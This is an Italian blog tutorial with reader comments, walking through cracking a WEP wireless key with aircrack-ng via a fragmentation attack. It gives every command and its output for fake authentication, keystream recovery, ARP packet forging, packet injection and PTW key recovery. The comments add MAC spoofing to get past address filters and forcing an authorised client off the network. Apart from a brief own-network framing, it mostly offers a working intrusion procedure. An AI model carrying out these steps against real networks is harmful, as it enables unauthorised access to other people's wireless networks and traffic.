Aircrack-ng – WEP Cracking with Fragmentation Attack

Con quest’ articolo dò il benvenuto nel mio piccolo ma impegnato e rispettoso staff a PinguinoNinja , lui non riteneva necessaria la pubblicazione dell’ How-To.. , ma io sì , e con questo tutorial glì dò quindi il mio benvenuto! brigante~

Quest’ How-To lo potete scaricare se volete anche dal Box , in cui lo troverete in *.pdf.….buona lettura.

cracking-wep.png

Questo tutorial spiega come recuperare una chiave WEP di una rete wireless con un attacco a frammentazione. Non intendo prendermi nessun merito per quello che scriverò visto che tutto è già stato spiegato sul sito Aircrack-ng.org in particolare da darkAudax in questi 2 tutorial:

—————>How to crack WEP with no wireless clients

—————>How to crack WEP via a wireless client

[REQUISITI]

Una rete wireless per sperimentare il tutorial, configurata in modo che utilizzi crittografia WEP a 64 o 128 bit, con autenticazione OPEN e il broadcast dell’ESSID attivato.
Un PC dotato di interfaccia wireless con dei driver patchati per l’injection; su questo pc deve anche essere installato aircrack-ng in maniera corretta e funzionante.Sul sito Aircrack-ng[www.aircrack-ng.org] ci sono le istruzioni per installare il programma e i driver. Il primo passo del tutorial sarà quello di controllare se tutto è stato installato correttamente.
Dovete essere abbastanza vicini all’AP per permettervi di trasmettere e ricevere i pacchetti.
Sull’AP devono esserci in transito dei “data packets“, vedremo come verificarlo.

[SCENARIO]

Access Point
MAC address = 00:C1:10:xx:xx:xx
ENC = WEP 128 bit
ESSID = test
Channel = 11

Laptop
MAC address ath0 = 00:02:A6:xx:xx:xx
Driver = Madwifi-ng

[SVOLGIMENTO]

Per prima cosa dobbiamo settare la nostra interfaccia wireless in monitor mode sulla stessa frequenza nella quale trasmette l’AP; possiamo farlo tramite airmon-ng. Apriamo un terminale e digitiamo:

——————————————–
airmon-ng start wifi0 11
——————————————–

Il sistema risponderà:

————————————————————————————-
Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
————————————————————————————-

Significa che è stata creata l’interfaccia ath0 in monitor mode, quindi srà questa che andremo ad usare per il nostro attacco.
Per confermare che tutto sia andato per il verso giusto sempre da terminale digitiamo:

———
iwconfig
———

otterremo un’output simile a questo:

—————————————————————————–
lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.462 GHz Access Point: 00:02:A6:xx:xx:xx
Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-88 dBm Noise level=-88 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
—————————————————————————–

Notate l’etichetta “Mode” che segnala “Monitor” e la frequenza “2.462 GHz“; per verificare che la frequenza corrisponda realmente a quella del canale di nostro interesse potete andare a questa pagina, cliccate su “WiFi Ch. Selection” e controllate che sia corretta.

Ora controlliamo se i driver sono stati installati correttamente. Useremo aireplay-ng, scriviamo:

——————–
aireplay-ng -9 ath0
——————–

e controlliamo la risposta del sistema:

——————————————————–
xx:xx:xx Trying broadcast probe requests…
xx:xx:xx Injection is working!
xx:xx:xx Found 1 AP

xx:xx:xx Trying directed probe requests…
xx:xx:xx 00:C1:10:xx:xx:xx – channel: 11 – ‘test’
xx:xx:xx Ping (min/avg/max): 1.624ms/22.416ms/47.329ms
xx:xx:xx 24/30: 80%
——————————————————–

Proseguite solo se avete conferma che tutto sia funzionante, altrimenti provate ad reinstallare i driver della scheda.
Il prossimo passo è quello di aprire airodump per catturare solo il traffico in transito “da e verso” il nostro access point, questo ci permetterà di recuperare informazioni necesarie al cracking della chiave WEP , quindi usiamo airodump-ng con filtro per BSSID e per canale:

———————————————————————–
airodump-ng –bssid 00:C1:10:xx:xx:xx –channel 11 –write capture ath0
———————————————————————–

dove:
–bssid 00:C1:10:xx:xx:xx è il MAC dell’AP
–channel 11 è il canale di trasmissione dell’AP
–write capture indica che il traffico è salvato nel file “capture”
ath0 è la nostra interfaccia wireless in monitor mode

A questo punto analizziamo la situazione che ci si presenterà dopo aver dato questo comando:

———————————————————————————–
CH 11 ][ Elapsed: 8 s ][ xxxx-xx-xx xx:xx

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:C1:10:xx:xx:xx 44 100 92 0 0 11 48 WEP WEP test

BSSID STATION PWR Lost Packets Probes
————————————————————————————

Come potete notare non vi sono client connessi alla nostra rete target, in questo caso dovremo autenticarci con l’ap attraverso una falsa autenticazione. Per effettuare useremo aireplay-ng, apriamo un’altro terminale, per permettere ad airodump-ng di continuare a catturare il traffico, e digitiamo:

————————————————————————
aireplay-ng -1 0 -e test -a 00:C1:10:xx:xx:xx -h 00:02:A6:xx:xx:xx ath0
————————————————————————

dove:
-1 0 indica che stiamo tentando una falsa autenticazione
-e test è il nome della rete wireless
-a 00:C1:10:xx:xx:xx è l’indirizzo MAC dell’AP
-h 00:02:A6:xx:xx:xx è l’indirizzo della nostra interfaccia di rete
ath0 è la nostra interfaccia di rete

Se l’attacco va a buon fine il risultato sarà:

————————————————————–
xx:xx:xx Waiting for beacon frame (BSSID: 00:C1:10:xx:xx:xx)
xx:xx:xx Sending Authentication Request
xx:xx:xx Authentication successful
xx:xx:xx Sending Association Request
xx:xx:xx Association successful🙂
————————————————————–

A questo punto stoppiamo airodump e rilanciamolo, ora avremo un client connesso (noi!):

———————————————————————————-
CH 11 ][ Elapsed: 16 s ][ xxxx-xx-xx xx:xx

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:C1:10:xx:xx:xx 44 100 163 60 0 11 48 WEP WEP OPN test

BSSID STATION PWR Lost Packets Probes

00:C1:10:xx:xx:xx 00:02:A6:xx:xx:xx 51 0 18
———————————————————————————–

Essere associati all’AP è essenziale per il nostro fine, altrimenti non accetterà i pacchetti che andremo ad inviargli in seguito.
Notate che grazie ad airodump-ng possiamo verificare se sono in transito sul nostro AP dei pacchetti “data” attraverso i numeri riportati nelle colonne “#Data, #/s” che ci indicano il numero di paccheti di quel tipo sniffati e quanti ne catturiamo al secondo, ovviamente avendo attivato l’opzione “-w” stiamo registrando questi pacchetti in un file. Visto che la rete è la nostra e magari non c’è nessun altro connesso oltre a noi, possiamo fare in modo che si generi del traffico di questo tipo pingando un host sconosciuto con un client connesso via cavo.
Adesso che siamo associati e stiamo sniffando il traffico di rete sul nostro AP passiamo al vero e proprio attacco a frammentazione. L’obbiettivo primario di questo attacco è quello di ottenere attraverso dei pacchetti in transito una “porzione di chiave”, ottenuta questa possiamo creare un pacchetto ARP da inviare all’AP in continuazione perchè generi del traffico necessario al cracking della chiave WEP.
Partiamo con l’attacco a frammentazione, digitiamo da terminale:

————————————————————–
aireplay-ng -5 -b 00:C1:10:xx:xx:xx -h 00:02:A6:xx:xx:xx ath0
————————————————————–

L’output di sistema sarà:

——————————————————————————–
xx:xx:xx Waiting for a data packet…

Size: 136, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:C1:10:xx:xx:xx
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:19:D2:3B:91:85

0x0000: 0841 2c00 00c1 10xx xxxx 0019 d23b 9185 .A,………;..
0x0010: ffff ffff ffff 1001 ffff 0000 4b9f 4a8e …………K.J.
0x0020: 7e0c 025d 0c68 7a0f 6901 6dbc 036f ae41 ~..].hz.i.m..o.A
0x0030: 672f 6808 e80a b2ca c33a 01ee c350 4407 g/h……:…PD.
0x0040: 1064 fa8c d9c0 00fb 7fd3 ff0b efb3 a5df .d………….
0x0050: 686b 76f1 47c7 776b b7c7 7aa5 3bd8 d440 hkv.G.wk..z.;..@
0x0060: ef4e e26c 4862 8df6 eb27 f71e 0d99 4786 .N.lHb…’….G.
0x0070: eca2 53c5 79ab 0c86 bbcc b3ab ce58 03ab ..S.y……..X..
0x0080: 77ee f69a 0244 3ac4 w….D:.

Use this packet ?
———————————————————————————

Quindi il sistema ha individuato un pacchetto che potrebbe andare bene al nostro scopo, noi controlliamo che l’etichetta “Size“, e cioè la dimensione, superi sempre i 68 bit. Selezioniamo il pacchetto premendo la lettera “y” per confermare la scelta. A questo punto il sistema cercherà di memorizzare la “porzione di chiave” in un file “.xor” che useremo insieme a packetforge-ng per creare il pacchetto ARP da iniettare nella rete.

———————————————————————————
Saving chosen packet in replay_src-xxxx-xxxxxx.cap
xx:xx:xx Data packet found!
xx:xx:xx Sending fragmented packet
xx:xx:xx Got RELAYED packet!!
xx:xx:xx Thats our ARP packet!
xx:xx:xx Trying to get 384 bytes of a keystream
xx:xx:xx Got RELAYED packet!!
xx:xx:xx Thats our ARP packet!
xx:xx:xx Trying to get 1500 bytes of a keystream
xx:xx:xx Got RELAYED packet!!
xx:xx:xx Thats our ARP packet!
Saving keystream in fragment-xxxx-xxxxxx.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
——————————————————————————–

Il sistema ha salvato la chiave nel file “fragment-xxxx-xxxxxx.xor“, usiamolo con packetforge-ng per creare il pacchetto che andreamo a iniettare:

——————————————————————————————————
packetforge-ng -0 -a 00:C1:10:xx:xx:xx -h 00:02:A6:xx:xx:xx -y fragment-xxxx-xxxxxx.xor -w arprequest -k 255.255.255.255 -l 255.255.255.255
——————————————————————————————————

dove:
-0 specifica che vogliamo creare un pacchetto ARP
-a 00:C1:10:xx:xx:xx è il MAC dell’AP
-h 00:02:A6:xx:xx:xx è il nostro MAC
-y fragment-xxxx-xxxxxx.xor
-w arprequest è il nome del file dove salveremo il pacchetto ARP

A conferma del lavoro svolto il sistema risponderà:

—————————-
Wrote packet to: arprequest
—————————-

Controlliamo se airodump è ancora in esecuzione, altrimenti avviamolo come al passo precedente, e mettiamo la finestra in un luogo ben visibile del monitor.
Controllato che airodump-ng sia attivo possiamo iniziare a trasmettere il pacchetto creato,usiamo aireplay-ng:

———————————-
aireplay-ng -2 -r arprequest ath0
———————————-

dove:
-2 indica che la selezione del pacchetto è interattiva
-r arprequest secifica il file da dove leggere il pacchetto ARP
ath0 è la nostra interfaccia di rete

Il sistema risponderà:

———————————————————————————–
Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:C1:10:xx:xx:xx
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:A6:xx:xx:xx

0x0000: 0841 0201 00c1 10xx xxxx 0002 a658 b8b5 .A…….. .X.[
0x0010: ffff ffff ffff 8001 a780 2e00 3480 c19c …………4…
0x0020: c503 b67c 7861 87bb e28e dc23 1fa3 6ff2 …|xa…..#..o.
0x0030: 7ba4 9b96 bdc3 642f d2e7 3332 fdaa 54ea {…..d/..32..T.
0x0040: 962b 97e9 .+..

Use this packet ?
————————————————————————————
Rispondiamo affermativamente inserendo la lettera “y” e confermiamo, aireplay incomincerà a inviare il pacchetto creato:

——————————————————
Saving chosen packet in replay_src-xxxx-xxxxxx.cap
You should also start airodump-ng to capture replies.

Sent 6832 packets…(341 pps)
——————————————————

Come potete leggere dalle risposte del sistema,stiamo inviando 341 pacchetti al secondo. Guardate ora la finestra di airodump-ng, se nella colonna “#Data” il numero incrementa velocemente significa che tutto è andato a buon fine e siamo a un passo dall’ottenere la chiave. Memorizzati abbastanza pacchetti di questo tipo, circa 100000 per una chiave WEP a 128 bit possono bastare, passiamo al cracking vero della chiave WEP con aircrack-ng…Apriamo un’altro terminale e inseriamo il comando:

————————————————-
aircrack-ng -z -b 00:C1:10:xx:xx:xx capture*.cap
————————————————-

dove:
-z indica il tipo di attacco PTW
-b 00:C1:10:xx:xx:xx filtra nel traffico catturato quelli provenienti dall’AP con questo MAC
-capture*.cap è il file contentente il traffico catturato.

Il sistema risponderà:

————————————————————————————————–
Opening capture-01.cap
Read 1636119 packets.

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 535892 ivs.

Aircrack-ng 0.9.1 r829

[00:00:00] Tested 0/1400000 keys (got 535892 IVs)

KB depth byte(vote)
0 0/ 1 xx(xxxx) 6F(2224) 5A(2222) E2(2203) 00(2201) 2A(2197) 4D(2187) 52(2184) 9A(2183)
1 0/ 1 xx(xxxx) FE(2225) 0D(2217) A5(2211) 8A(2191) 11(2185) 1F(2182) 4E(2177) 2D(2172)
2 0/ 1 xx(xxxx) 95(2220) 1E(2200) 42(2194) 36(2188) D6(2185) 53(2177) 22(2176) 61(2176)
3 0/ 1 xx(xxxx) 5D(2222) D6(2208) 15(2206) 4D(2204) 38(2201) CC(2201) 2E(2196) 01(2186)
4 0/ 1 xx(xxxx) 89(2211) E8(2211) F7(2209) 68(2208) 4B(2202) 4D(2199) DB(2193) F5(2188)
5 0/ 1 xx(xxxx) A0(2234) 09(2203) 3A(2201) 63(2192) 55(2191) 29(2188) AF(2182) F9(2181)
6 0/ 1 xx(xxxx) 13(2211) CE(2198) 82(2188) 39(2178) AA(2178) BC(2177) DC(2175) 8F(2173)
7 0/ 1 xx(xxxx) 7E(2236) 8B(2203) 11(2200) 48(2196) 1C(2178) 51(2178) 33(2176) 64(2175)
8 0/ 1 xx(xxxx) F4(2243) A3(2214) F0(2204) E5(2188) 49(2187) 79(2177) 91(2174) 84(2173)
9 0/ 1 xx(xxxx) E0(2251) 82(2241) 45(2224) D3(2208) D8(2203) 54(2202) EA(2193) 5E(2174)
10 0/ 1 xx(xxxx) 78(2265) B9(2232) 52(2223) 13(2206) 66(2203) 44(2193) BF(2191) C6(2188)
11 0/ 1 xx(xxxx) 6E(2223) D5(2207) 7B(2194) F4(2194) E3(2184) 2B(2180) 18(2177) D6(2176)
12 0/ 1 xx(xxxx) 8F(2201) 1F(2197) FE(2191) 56(2182) C5(2181) 37(2178) B0(2174) BF(2170)

KEY FOUND! [ xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx ]
Decrypted correctly: 100%
————————————————————————————————-

Come potete vedere abbiamo ottenuto la chiave WEP!

Spero di essere stato utile.

PinguinoNinja

 

22 commenti

  1. Ciao br1g4nt3
    la guida è ottima, ma mi sono rimaste delle perplessità,
    1° non mi è chiaro infatti il punto in cui parli del traffico che si dovrebbe generare dopo che siamo riusciti a farci autenticare dal AP, potresti spiegarmelo meglio?
    2° quando dici di Stoppare Airodump e rilanciarlo, c’è un comando specifico o bisogna solamente chiudere la shell e riaprine un’altra e rilanciare airodump-ng… ?
    3° Questo tipo di attacco funziona se l’ AP oltre la chiave WEP ha anche configurato il filtro degli indirizzi MAC?

    spero di essere stato chiaro
    Ciao Nino

  2. ciao NINO ,
    sono delle cose che saprei dirti a grandi linee , ma visto che la guida è di pinguinoNinja , spetta a lui chiarirti le idee.

    ciao.

  3. Ciao Nino,
    scusa se tardo nel risponderti ma non sono a casa mia in italia e faccio fatica a collegarmi…non perche non trovi accessi ( ovvio no? ) ma perchè sono sempre in giro a fare festa!🙂
    cercherò di essere chiaro nel risponderti.

    1. visto che noi stiamo facendo un test, avendo un client connesso all’AP tramite cavo e non in wireless, possiamo generare il traffico di dati necessario al nostro scopo semplicemente pingando un’host estraneo alla rete con il client connesso via cavo.
    esempio:

    tu hai, 1 client (chiamato “AA”) connesso via cavo al tuo AP con IP 192.168.1.100, e il tuo bel laptop (chiamato “BB”) con backtrack installato o perlomeno aircrack-ng. Una volta che BB riesce ad associarsi alla rete deve poter recuperare una pacchetto ARP in transito sull’AP per poter generare del traffico utile al cracking della chiave. Questo pacchetto ARP può essere generato aprendo una shell di AA e pingando un client estraneo alla rete, in questo esempio l’IP 192.168.1.101 è estraneo alla nostra rete, quindi pingando quest’ultimo si genererebbe un pacchetto ARP che se intercettato puó essere riutilizzato.

    ovviamente in tutto questo do per scontanto che tu conosca l’utilizzo del comando ping e che almeno ti sia documentato un pochino su cosa sia un pacchetto ARP!!!

    2. hmmm…per stoppare un programma in esecuzione da shell basta usare CTRL+C (anche chiudendo la shell interrompi tutto)

    3. ok, qualora fosse attivato un filto sugli indirizzi MAC dobbiamo per forza conoscere l’indirizzo MAC di un client con accesso autorizzato e usare MACChanger per modificare il nostro MAC in quello del client autorizzato. A questo punto possiamo decidere se aspettare che si sconnetta per poi autenticarci noi e procedere oppure costringerlo a sconnettersi per “rubargli il posto”!!!

    spero di essere stato chiaro…

    ciauz

  4. grazie per la risposta PinguinoNinja, ho afferrato il discorso.
    Premetto che io ho usato la versione live di BackTrack, passando alla pratica mi sono accorto che nella guida ci sono, diciamo, 2 piccoli “nei”
    1)il comando
    packetforge-ng -0 -a 00:C1:10:xx:xx:xx -h 00:02:A6:xx:xx:xx -y fragment-xxxx-xxxxxx.xor -w arprequest
    così com’è non sembra funzionare da un errore è richiede un indirizzo IP, dal primo link esterno della guida mi sono accorto che mancano i parametri[b] – k xxx.xxx.xxx.xxx[/b] e [b]-l xxx.xxx.xxx.xxx[/b] (e quì sorge il dubbio, io nella mia rete quei valori li conosco, ma se non li conoscessi da dove li potrei reperire?)
    2) l’opzione -z del comando aircrack-ng -z -b 00:C1:10:xx:xx:xx capture*.cap non è effettuabile da un livecd di BT2 in quanto PTW non è installato ho sopperito col comando: aircrack-ng -b XX:XX:XX:XX:XX:XX -n 64 capture*.cap
    questo perchè ho usato una chiave a 64 bit

    ps: PinguinoNinja hai anche tu un blog tipo quello di br1g4nt3 ?

  5. dimenticavo per questo comando:
    aireplay-ng -9 ath0
    l’opzione -9 sei sicuro che sia giusta?

  6. Ciao Nino.

    scusami,hai ragione ho omesso i parametri [b]-k[/b] e [b] -l[/b] quando uso [b]packetforge-ng[/b], per la maggior parte degli AP puoi mettere ad entrambi [b]255.255.255.255[/b].Nel caso in cui non dovesse funzionare dobbiamo ottenere gli indirizzi IP e per farlo si fa un pò di packet sniffing…ora non sto a spiegarti tutto perchè è lunghissimo come discorso, coprirò l’argomento quando farò un HowTo sull’attacco “KoreK Chop Chop”.

    bravissimo, l’uso dell’opzione ptw è comoda perchè permette di ottenere la chiave più in fretta ma pur usando i normali comandi di aircrack-ng funziona alla grande.

    l’opzione -9 è corretta perchè??
    ti da qualche errore??

    controlla sulla documentazione di aireplay-ng, basta che da terminale lanci:
    [i]aireplay-ng –help[/i]
    funziona anche cosi:
    [i]aireplay-ng –test ath0[/i]

    no a me non è interessato più avere un blog…appoggio il blog di brigante perchè credo che ci sia troppa dispersione di informazioni per la rete, raccoglierle tutte nel suo blog è meglio!

    ciao e spero ancora che ti sia tutto chiaro

  7. dimenticavo….

    ciao brigante!!!!!!!!!!!

    senti quando riesci modifica il post e mettici i parametri

    -k 255.255.255.255
    -l 255.255.255.255

    al comando packetforge-ng!

    grazie mille

    ciauz

  8. scusate, ma la key found va inserita cosi come ce la da
    xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx nei vari programmi che gestiscono la connessione?compresi i due punti tra un valore e l’altro? (es. zero configuration, intel Proset/wireless)
    grazie

  9. ciao Fabrizio,
    no , non è così che funziona , il fatto è che per fare le guide o tutorial noi li proviamo e ne postiamo i risultati altrimenti qualcuno potrebbe pensare che copiamo da altri siti… capisci?

    allora quando vedi inserite le xx:xx:xx…eccetera , significa che sono state messe lì al posto del MAC address dell’autore del tutorial , altrimenti svelerebbe a tutti coloro che leggono la sua guida il propio MAC e non è una cosa sicura , ma comunque le xx:xx:xx:xx… stanno a rappresentare il risultato che viene dato dal cracking della rete , ovvero il MACaddress della vittima , oppure il MACaddress dell’ attacker.

    ciao

  10. come posso sapere se la mia scheda wi-fi pci della d-link modello DWL-G520 supporta la modalità MONITOR MODE? grazie
    é suff installare madwifi oltre il tool di aircrack? grazie

  11. è tutto descritto quì….
    http://backtrack.offensive-security.com/index.php/HCL:Wireless
    ciao.

  12. io sn arrivato fino al punto in cui si ricomincia a mandare il pacchetto….nn so perche ma s’interrompe subito arriva nemmeno a 600 pacchhetti e si blocca e il traffico generato è pochissimo T_T

  13. guarda la configurazione della tua scheda sul wiki….

    …sembrerebbe dipendere dalla connessione , alcune schede supportano l’ injection , altre non bene-bene…

    …ciao.

  14. Aircrack-ng 0.9.1

    [05:19:11] Tested 10499840 keys (got 144099 IVs)

    KB depth byte(vote)
    0 0/ 1 EA( 42) 9D( 15) 8D( 15) A6( 15) E5( 5) CE( 3)
    1 0/ 4 50( 21) 16( 18) 4A( 16) 89( 13) FA( 8) EE( 5) P
    2 0/ 3 00( 18) 20( 15) 4F( 13) 57( 8) 5A( 8) BB( 8)
    3 0/ 1 38( 25) 1A( 8) 2B( 6) B5( 5) B8( 5) A5( 5) 8

    KEY FOUND! [ EA:50:00:38:E9 ]
    Decrypted correctly: 100%

  15. KEY FOUND! [ EA:50:00:38:E9 ] hek tecmal tecürbe

  16. Ciao ragazzi premetto che sono nuovo nel mondo linux…e mi servirebbe qualche dritta….
    ….quando la shell mi da questo errore ke significa???

    bt ~ # airmon-ng start wifi0 11

    Interface Chipset Driver

    eth1 Broadcom bcm43xx

    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    eth1 IEEE 802.11b/g ESSID:off/any Nickname:”Broadcom 4311″
    Mode:Managed Frequency=2.437 GHz Access Point: Invalid
    RTS thr:off Fragment thr:off
    Encryption key:off
    Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    bt ~ # aireplay-ng -9 ath1
    Interface ath1:
    ioctl(SIOCGIFINDEX) failed: No such device
    bt ~ # aireplay-ng -9 ath0
    Interface ath0:
    ioctl(SIOCGIFINDEX) failed: No such device

    aiutatemi per favore !!!!!

  17. ciao brigante ho un quesito da porti.
    Mi connnetto a un ruter che non ha nessuna protezione wep ne wpa….. è libero con un buon segnale essendo il mio vicino di casa. Come mai quando tento di entrare in una pagina internet non mi fa entrare ? ti faccio presente che l’ip lo prende automaticamente e mi da “connesso” Ciao e grazie

  18. Ho un piccolo problemino. Ho seguito il tutorial passo passo ed ogni volta che vado a criptare il file .cap mi da errore e mi dice di ritrovare con altri ivs. Ho catturato piu di 100.000 pacchetti. Perchè non riesce a decriptarmi la password?

  19. aireplay-ng: invalid option — z (io avevo messo aireplay -z -b xx:xx:xx:xx:xx:xx -replay.xxxxxxxxxxxx.cap)

    come mai?

  20. si usavo aireplay xd, ci sono riuscito in mezzo seconto con 485mila pacchetti

  21. Ho da poco un nuovo portatile con una scheda intel pro 2200 bg, e per provare un pò la rete wifi ho provato a fare qualche test sulla mia rete ottenendo risultati scadenti.
    Ad esempio il comando aireplay-ng -9 eth1 non mi da il risultato che dovrebbe darmi…idem quando do il comando aireplay-ng per la falsa autenticazione…
    Questione di driver?

  22. Ciao peppux,
    anche io come te ho la intel ipw2200, putroppo non va.
    Potresti cercare dei driver modificati, ma non ti conviene, sono difficili da installare e poi la tua scheda non la puoi usare mai come si deve.
    Cambiala come ho fatto io, ho comprato un’ Alfa.
    Ciao ciao.


Comments RSS TrackBack Identifier URI

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...